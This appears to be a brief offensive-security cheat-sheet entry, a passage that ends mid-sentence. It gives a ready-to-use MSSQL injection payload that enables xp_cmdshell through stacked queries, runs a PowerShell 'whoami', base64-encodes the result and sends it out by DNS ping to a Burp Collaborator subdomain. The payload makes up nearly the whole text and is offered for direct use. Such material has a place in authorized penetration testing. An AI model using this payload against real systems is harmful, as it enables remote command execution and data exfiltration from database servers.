The following command enabled xp_cmdshell, and executes a simple powershell command and get the executed command response in DNS request.
random';EXEC sp_configure 'show advanced options', 1; EXEC sp_configure 'xp_cmdshell', 1; reconfigure with override; exec master..xp_cmdshell 'powershell $cmd=whoami; $enc=[Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($cmd)).trim(''=''); ping -n 1 $enc''.mysubdomainhere.burpcollaborator.net'' '-- -
If successfully, on Collaborator you will see:
